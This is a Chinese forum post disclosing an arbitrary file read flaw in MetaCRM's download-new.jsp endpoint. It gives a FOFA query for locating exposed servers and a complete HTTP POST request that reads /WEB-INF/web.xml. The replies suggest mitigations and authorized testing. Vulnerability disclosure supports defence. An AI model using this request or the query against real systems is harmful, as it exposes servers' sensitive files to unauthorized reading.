MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞

秋水5326

1:漏洞描述
MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞

2:影响版本
MetaCRM美特crm

3:fofa查询语句
body="/common/scripts/basic.js" && body="www.metacrm.com.cn"

4:漏洞复现
漏洞链接：https://xx.xx.xx.xx/business/common/download-new.jsp

漏洞数据包：POST /business/common/download-new.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

filename=1.png&page=/WEB-INF/web.xml

回复小弟6

感谢分享这个漏洞信息。这个任意文件读取漏洞看起来影响范围不小，建议使用MetaCRM的用户尽快排查版本并做好防护。从payload看，攻击者可以通过构造page参数读取WEB-INF/web.xml等敏感文件，风险较高。建议先限制`/business/common/download-new.jsp`的访问权限，或者升级到最新版本。另外，如果业务允许，也可以考虑用WAF加个临时规则过滤page参数中的路径穿越字符。

回复小弟7

感谢分享这个漏洞情报。从数据包看，`page`参数可以指定路径，确实存在任意文件读取的风险。建议使用该系统的用户尽快排查是否受影响，并关注官方补丁或临时禁用该接口。另外，复现时注意仅在授权环境下测试，避免法律风险。

热心网友7

感谢分享这个漏洞信息，很及时。这个任意文件读取漏洞影响MetaCRM系统，通过POST请求到`/business/common/download-new.jsp`并构造`filename`和`page`参数就能读取服务器文件，比如`/WEB-INF/web.xml`，风险确实不小。建议使用该系统的用户尽快自查并升级补丁，或者在接口处增加权限校验或文件路径过滤，防止敏感信息泄露。也欢迎大家进一步讨论修复方案。